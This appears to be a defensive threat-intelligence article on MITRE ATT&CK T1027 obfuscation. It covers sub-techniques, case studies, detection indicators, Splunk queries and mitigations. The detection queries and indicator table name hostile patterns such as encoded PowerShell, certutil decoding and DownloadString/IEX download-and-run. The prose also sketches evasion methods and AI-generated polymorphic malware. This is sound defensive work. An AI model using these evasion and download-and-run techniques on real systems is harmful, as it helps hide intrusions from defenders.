T1027 is among the broadest techniques in the MITRE ATT&CK framework, with 17 sub-techniques spanning every major obfuscation method. It appears in the procedures of over 400 documented malware families and threat groups. Virtually every sophisticated attack incorporates at least one form of obfuscation — making T1027 not just a technique, but a foundational capability that enables all other phases of an intrusion.
T1027 maps to a single ATT&CK tactic — Defense Evasion — but its impact extends across the entire kill chain. Obfuscation protects payloads during Initial Access (encrypted attachments, smuggled HTML files), shields commands during Execution (encoded PowerShell, obfuscated scripts), and conceals communications during Command and Control (encrypted C2 traffic, steganographic channels). It is the enabling layer that allows other techniques to function without being detected.
The technique operates across every platform: Windows, Linux, macOS, ESXi, network devices, and cloud environments. It applies to files at rest on disk, data in transit over the network, and commands executed in memory. This universality, combined with the near-infinite variety of encoding and encryption methods available, makes T1027 one of the most challenging techniques to detect comprehensively.
How Obfuscation Works
Obfuscation serves three strategic purposes for an adversary:
Defeating static analysis. Security tools that scan files on disk rely on signatures, patterns, and string matching. Obfuscation transforms these recognizable patterns into unrecognizable data. An encoded PowerShell command, a packed executable, or an XOR-encrypted payload produces no matching signatures until it is decoded at runtime — at which point the static scanner has already classified the file as clean.
Inhibiting reverse engineering. When malware is captured for analysis, obfuscation increases the time and effort required to understand its functionality. Control flow flattening, junk code insertion, string encryption, and dynamic API resolution force analysts to spend hours or days deobfuscating code before they can begin understanding what it does. This buys the attacker time to operate before defenses are updated.
Bypassing content inspection. Email gateways, web proxies, and network security tools inspect traffic for malicious content. Obfuscation transforms that content into forms that pass inspection: Base64-encoded payloads embedded in HTML files, malicious code hidden within image pixels, or executables concealed inside password-protected archives that cannot be scanned.
Sub-Techniques
MITRE ATT&CK v18 defines 17 sub-techniques under T1027 — the largest set of any technique in the framework. These can be grouped into four functional categories:
Payload Encryption and Encoding
| Sub-Technique | Method |
|---|---|
| T1027.013 — Encrypted/Encoded File | Files encrypted with XOR, AES, RC4, or custom algorithms, or encoded with Base64, hex encoding, or ROT ciphers. The payload is decrypted/decoded at runtime. This is the most common obfuscation method, used by everything from nation-state implants to commodity infostealers. |
| T1027.002 — Software Packing | Executable compression using packers like UPX, Themida, VMProtect, or custom packers. The packed binary contains a decompression stub that unpacks the real payload into memory at execution time. Packing changes the file hash, defeats signature matching, and prevents static analysis of the contained code. |
| T1027.014 — Polymorphic Code | Malware that rewrites its own code with each infection cycle while maintaining identical functionality. Each instance produces a unique hash and unique code patterns, rendering signature-based detection fundamentally unable to keep pace. In 2026, agentic AI is accelerating polymorphic generation, allowing operators to produce new variants on demand without manual coding. |
| T1027.015 — Compression | Payloads compressed with standard algorithms (ZIP, GZIP, LZMA) or password-protected archives that prevent automated scanning. Compressed JavaScript, archived scripts, and nested ZIP files are common delivery vectors through email. |
Hiding Data in Other Files
| Sub-Technique | Method |
|---|---|
| T1027.003 — Steganography | Concealing malicious code, configuration data, or C2 addresses within image, audio, or video files using techniques like Least Significant Bit (LSB) substitution. The cover file appears completely normal to human observers and file-type analysis. The payload is extracted at runtime by the malware. Steganographic attacks increased significantly in 2024-2025, with campaigns using PowerShell to download and extract DLL payloads hidden within GIF and PNG images. |
| T1027.006 — HTML Smuggling | Embedding malicious payloads as encoded data within HTML files or JavaScript blobs. When the victim opens the HTML file in a browser, JavaScript assembles and downloads the payload locally, bypassing network-layer security that only sees legitimate HTML traffic. Widely used by NOBELIUM, Qakbot, and phishing campaigns targeting Microsoft 365. |
| T1027.017 — SVG Smuggling | A newer variant of HTML smuggling that embeds malicious JavaScript and encoded payloads within SVG (Scalable Vector Graphics) image files. Because SVG files are XML-based and support embedded scripts, they can execute code when opened in a browser while appearing to be harmless image files. SVG smuggling campaigns targeting Brazilian banking malware evolved into memory-resident loaders in 2025. |
| T1027.009 — Embedded Payloads | Malicious code hidden within the resources, overlays, or appended data sections of otherwise legitimate-looking files. The host file functions normally while carrying a concealed payload extracted during execution. |
| T1027.012 — LNK Icon Smuggling | Embedding malicious data within the icon resource of Windows shortcut (LNK) files. The LNK file displays a legitimate icon while carrying hidden payload data that is extracted and executed by the shortcut's target command. |
Code and Command Obfuscation
| Sub-Technique | Method |
|---|---|
| T1027.010 — Command Obfuscation | Obscuring commands executed via PowerShell, cmd.exe, bash, or other interpreters using environment variable substitution, string concatenation, character escaping, Base64 encoding, or tool-specific obfuscation (e.g., Invoke-Obfuscation for PowerShell). A 2025 campaign used SomalifuscatorV2, ROT-24 encoding, and UTF-16 BOM insertion to achieve 0/64 detection on VirusTotal. |
| T1027.004 — Compile After Delivery | Delivering source code or intermediate language that is compiled on the victim system using native compilers (csc.exe for C#, gcc for C, MSBuild for project files). The uncompiled source avoids binary-focused detection entirely. |
| T1027.007 — Dynamic API Resolution | Resolving Windows API function addresses at runtime through hash-based lookups rather than static imports. The import table of the executable appears clean, hiding the malware's true capabilities from static analysis tools that enumerate imported functions. |
| T1027.016 — Junk Code Insertion | Adding non-functional code, dead branches, and irrelevant instructions to increase binary size, alter hashes, and complicate analysis. Simple but effective at defeating hash-based and pattern-matching detections. |
Artifact Removal and Manipulation
| Sub-Technique | Method |
|---|---|
| T1027.005 — Indicator Removal from Tools | Removing or modifying indicators from tools when detected — stripping debug symbols, removing identifying strings, changing file signatures, or recompiling with modified parameters to evade updated detections. |
| T1027.008 — Stripped Payloads | Removing symbol tables, debug information, and other metadata from compiled binaries to hinder reverse engineering and prevent analysts from understanding function names and program structure. |
| T1027.001 — Binary Padding | Appending junk data to a malicious binary to alter its hash, increase its file size (potentially exceeding sandbox analysis limits), and change its on-disk representation without affecting functionality. |
| T1027.011 — Fileless Storage | Storing malicious content in locations that bypass traditional file-based scanning — Windows Registry values, WMI repositories, event logs, or other system databases where executable content is not expected. |
AI-Assisted Obfuscation in 2026
Generative AI has introduced a new dimension to malware obfuscation. State-backed actors from Iran, China, North Korea, and Russia have been documented using LLM services to generate obfuscated scripts, refine payload encoding, and produce polymorphic variants. A phishing campaign targeting French users used HTML smuggling to deliver password-protected ZIP archives containing VBScript and JavaScript with neatly formatted comments characteristic of AI-generated code — an ironic signature where the AI's helpfulness in documenting code paradoxically aids forensic identification.
The more concerning trend is the use of AI to automate polymorphic generation at scale. When an attacker can prompt an LLM to produce functionally identical but syntactically unique payloads on demand, the traditional concept of a "signature" for a malware family becomes fundamentally inadequate. Each instance is unique. Each hash is novel. Only behavioral detection that focuses on what the code does — rather than what it looks like — can keep pace.
Real-World Case Studies
3CX Supply Chain Compromise — Multi-Layer Obfuscation
The 2023 3CX supply chain attack, attributed to Lazarus Group (North Korea), demonstrated sophisticated multi-layer obfuscation. The trojanized desktop application contained an encrypted payload hidden within a DLL that was loaded through DLL side-loading. The payload used AES encryption with a key derived from the application's legitimate code, making the malicious content indistinguishable from normal application data during static analysis. The attack chain also employed steganographic techniques, with C2 server addresses encoded within icon files hosted on GitHub. This layering of encrypted payloads, legitimate code camouflage, and steganographic communication channels made the compromise extraordinarily difficult to detect and required months of investigation across multiple security vendors.
Steganographic RAT Delivery Campaigns (Q3 2025)
Forcepoint X-Labs documented a wave of campaigns in Q3 2025 using obfuscated JavaScript email attachments that leveraged PowerShell and steganography to deliver .NET-based RATs and infostealers. The attack chain began with heavily obfuscated JavaScript files that, when executed, launched PowerShell commands to download seemingly innocent GIF image files. The images contained DLL payloads hidden using LSB steganography, which were extracted by the PowerShell script, loaded into memory via process hollowing, and executed without ever touching disk as recognizable executables. The combination of script obfuscation, steganographic payload delivery, and in-memory execution created a delivery pipeline that defeated email gateways, network inspection, and endpoint file scanning simultaneously.
SVG Smuggling Evolution — From Banking Malware to Memory-Resident Loaders
In 2025, security researchers tracked the evolution of SVG smuggling techniques from initial use in Brazilian banking malware to sophisticated memory-resident loaders targeting organizations worldwide. The threat actors embedded encoded payloads and malicious JavaScript within SVG image files, which were delivered through phishing emails. When opened in a browser, the SVG files executed embedded scripts that assembled and launched payloads entirely in memory. The latest variants adopted modular architectures with encrypted communications, representing what researchers described as "a natural evolution" from earlier, simpler smuggling techniques into full-featured evasion platforms.
Zero-Detection Batch File Obfuscation
VMRay documented a heavily obfuscated Windows batch file that achieved a 0/64 detection score on VirusTotal through multiple layered obfuscation techniques. The file used SomalifuscatorV2 for initial obfuscation, added a UTF-16 Byte Order Mark to confuse text editors and parsers, applied ROT-24 encoding to further obscure content, and incorporated an anti-analysis check that terminated execution if launched from a command line (indicating sandbox analysis) but proceeded if double-clicked (indicating a real victim). The batch file triggered MSHTA to execute additional obfuscated code, which used PowerShell to download and execute an infostealer that exfiltrated data through Discord. This case illustrates how layering relatively simple obfuscation techniques can achieve total evasion of current detection technology.
NOBELIUM / Cozy Bear — HTML Smuggling at Scale
The Russian state-sponsored group behind the SolarWinds attack has extensively used HTML smuggling (T1027.006) in phishing campaigns. Their EnvyScout dropper delivers malicious payloads encoded as Base64 blobs within HTML email attachments. When the victim opens the attachment in a browser, JavaScript decodes and assembles a malicious ISO or IMG file that is automatically downloaded. Because the email attachment is a legitimate HTML file and the payload assembly occurs client-side in the browser, email security gateways that inspect attachments see only HTML and JavaScript — no executable content passes through the network. This technique has been used to deliver Cobalt Strike beacons, BoomBox downloaders, and other post-exploitation tools.
Detection Strategies
Detecting obfuscation is fundamentally different from detecting other ATT&CK techniques. The obfuscation itself is not the malicious action — it is the concealment layer that hides the malicious action. Detection strategies must therefore focus on identifying obfuscation artifacts, monitoring the deobfuscation process, and analyzing the behavior of the deobfuscated content.
Key Indicators and Data Sources
| Indicator | What to Monitor |
|---|---|
| High file entropy | Encrypted and packed files have entropy values approaching 8.0 (the maximum for random data). Files with entropy above 7.0 that are not known compressed formats warrant investigation |
| Base64 in scripts | PowerShell commands containing -EncodedCommand, [Convert]::FromBase64String, or long Base64 strings in command-line arguments |
| Script block logging | PowerShell Script Block Logging (Event ID 4104) captures the deobfuscated content of scripts after AMSI processing, revealing the true commands regardless of encoding layers |
| Packer signatures | PE file section names associated with known packers (UPX0/UPX1, .themida, .vmp), unusual section characteristics, or import tables with only a few functions (typical of packed binaries that resolve imports at runtime) |
| LOLBin abuse | Execution of certutil.exe -decode, mshta.exe, regsvr32.exe, or rundll32.exe with encoded or obfuscated arguments — legitimate tools being used to decode and execute hidden payloads |
| HTML/SVG attachments | Email attachments containing HTML or SVG files with large embedded JavaScript blobs, especially those using atob(), Uint8Array, or Blob constructors to assemble files client-side |
Detection Queries
These queries target the deobfuscation and execution phases where obfuscated content is decoded and run. Tune to exclude legitimate administrative scripts and automation.
Encoded PowerShell Execution — Detects PowerShell commands using Base64 encoding, the most common script obfuscation method:
index=sysmon EventCode=1 | where (Image="*\\powershell.exe" OR Image="*\\pwsh.exe") | where (CommandLine="*-enc*" OR CommandLine="*-EncodedCommand*" OR CommandLine="*FromBase64String*" OR CommandLine="*[Convert]*") | table _time, Computer, User, ParentImage, CommandLine
LOLBin Decoding Operations — Identifies legitimate Windows binaries being used to decode obfuscated payloads:
index=sysmon EventCode=1 | where (CommandLine="*certutil*-decode*" OR CommandLine="*certutil*-urlcache*" OR CommandLine="*mshta*javascript*" OR CommandLine="*mshta*vbscript*") | table _time, Computer, User, ParentImage, Image, CommandLine
PowerShell Script Block Logging for Deobfuscated Content — Captures the actual commands after AMSI deobfuscation, revealing true intent regardless of encoding:
index=wineventlog source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 | where (ScriptBlockText="*Net.WebClient*" OR ScriptBlockText="*DownloadString*" OR ScriptBlockText="*Invoke-Expression*" OR ScriptBlockText="*IEX*" OR ScriptBlockText="*Start-Process*") | table _time, Computer, UserID, ScriptBlockText
Known Threat Actors and Malware Using T1027
T1027 has one of the largest documented procedure lists in the entire ATT&CK framework. The following represents a cross-section across the obfuscation spectrum:
| Actor / Malware | Obfuscation Methods |
|---|---|
| Lazarus Group | AES-encrypted payloads, steganographic C2 in icon files, multi-layer encoding in supply chain attacks (3CX) |
| NOBELIUM / Cozy Bear | HTML smuggling via EnvyScout, Base64-encoded payloads in HTML attachments, layered encryption in GoldMax/SUNSHUTTLE |
| APT28 / Fancy Bear | XOR-encrypted strings, custom packers, stripped payloads in Sofacy and Zebrocy toolsets |
| APT41 | Custom packers, DLL side-loading with encrypted payloads, DUSTPAN loader obfuscation |
| Mustang Panda | Custom encrypted loaders (PAKLOG, CorKLOG), SplatCloak obfuscated drivers |
| FIN7 | Obfuscated JavaScript, encoded PowerShell downloaders, DiceLoader with custom encryption |
| LummaC2 | Control flow flattening, XOR-encrypted strings, dynamic configuration files, trigonometric anti-analysis |
| Cobalt Strike | Malleable C2 profiles with encoded traffic, packed Beacon payloads, shellcode encryption |
| Qakbot | HTML smuggling delivery, multi-layer packed DLLs, encoded configuration files |
| FormBook / XLoader | Heavy encryption, custom packing across Windows and macOS variants |
Defensive Recommendations
Signature-based detection is fundamentally inadequate against obfuscation. Each encoding, encryption, or packing method produces unique file hashes and unique byte patterns. Detection must focus on behavioral analysis, deobfuscation monitoring, and content inspection after decoding rather than pattern matching against obfuscated content.
- Enable PowerShell Script Block Logging and AMSI: PowerShell Event ID 4104 captures deobfuscated script content after the Anti-Malware Scan Interface processes it, revealing the true commands regardless of how many encoding layers were applied. This is the single most valuable telemetry source for detecting obfuscated PowerShell — the dominant script obfuscation vector. Ensure AMSI is not bypassed or disabled (monitor for T1562.001).
- Deploy content disarm and reconstruction (CDR): CDR solutions strip active content from documents, HTML files, and other file types before delivery to users. This neutralizes HTML smuggling, SVG smuggling, embedded payloads, and macro-based obfuscation by removing the scripting and encoding mechanisms that deliver the payload, regardless of the specific obfuscation technique used.
- Implement entropy-based file analysis: Configure security tools to flag files with abnormally high entropy scores, which indicate encryption or compression. Legitimate executables typically have entropy between 5.0 and 7.0. Files above 7.0 that are not recognized compressed formats warrant additional analysis. Apply this to both inbound email attachments and files created on endpoints.
- Block or restrict LOLBin abuse: Monitor and restrict the execution of Windows binaries commonly used for decoding:
certutil.exewith decode parameters,mshta.exewith script arguments,regsvr32.exeloading remote content, andrundll32.exewith unusual DLL paths. Application control policies can restrict these binaries to specific approved use cases. - Deploy behavioral EDR with memory scanning: Since obfuscated payloads must be decoded before execution, behavioral EDR that monitors process memory can detect the deobfuscated malicious content when it materializes in memory. This catches packed, encrypted, and steganographically hidden payloads at the moment they transition from concealed to executable.
- Restrict HTML and SVG email attachments: Block or quarantine HTML and SVG file attachments at the email gateway. Legitimate business communication rarely requires HTML file attachments, and SVG files sent via email are almost always malicious. If business needs require HTML attachments, implement CDR processing before delivery.
- Analyze network traffic for encoding patterns: Deploy network detection that identifies Base64-encoded blobs, unusual Content-Type headers, and steganographic indicators in image file downloads. Monitor for large data transfers disguised as image downloads from suspicious domains.
- Use sandbox detonation with extended analysis: Ensure sandbox environments execute samples long enough for time-delayed deobfuscation to occur, force-execute sleep calls, and capture the deobfuscated payloads when they materialize. Combine sandbox analysis with static entropy analysis and import table inspection to identify packed or encrypted samples before detonation.
MITRE ATT&CK Mapping
| Field | Value |
|---|---|
| Technique ID | T1027 |
| Technique Name | Obfuscated Files or Information |
| Tactics | Defense Evasion |
| Platforms | Windows, Linux, macOS, ESXi, Network Devices |
| Sub-Techniques | T1027.001 Binary Padding, .002 Software Packing, .003 Steganography, .004 Compile After Delivery, .005 Indicator Removal from Tools, .006 HTML Smuggling, .007 Dynamic API Resolution, .008 Stripped Payloads, .009 Embedded Payloads, .010 Command Obfuscation, .011 Fileless Storage, .012 LNK Icon Smuggling, .013 Encrypted/Encoded File, .014 Polymorphic Code, .015 Compression, .016 Junk Code Insertion, .017 SVG Smuggling |
| Data Sources | File (Content, Metadata), Process (Creation), Command (Execution), Script (Execution), Windows Registry (Key Modification) |
| MITRE Reference | attack.mitre.org/techniques/T1027 |
Sources and References
- MITRE ATT&CK — T1027 Obfuscated Files or Information: attack.mitre.org
- Picus Security — The MITRE ATT&CK T1027 Obfuscated Files or Information Technique: picussecurity.com
- Forcepoint X-Labs — Q3 2025 Threat Brief: Obfuscated JavaScript and Steganography: forcepoint.com
- VMRay — Malware and Phishing Threat Landscape Report 2024/2: vmray.com
- CISA — Eviction Strategies for T1027: cisa.gov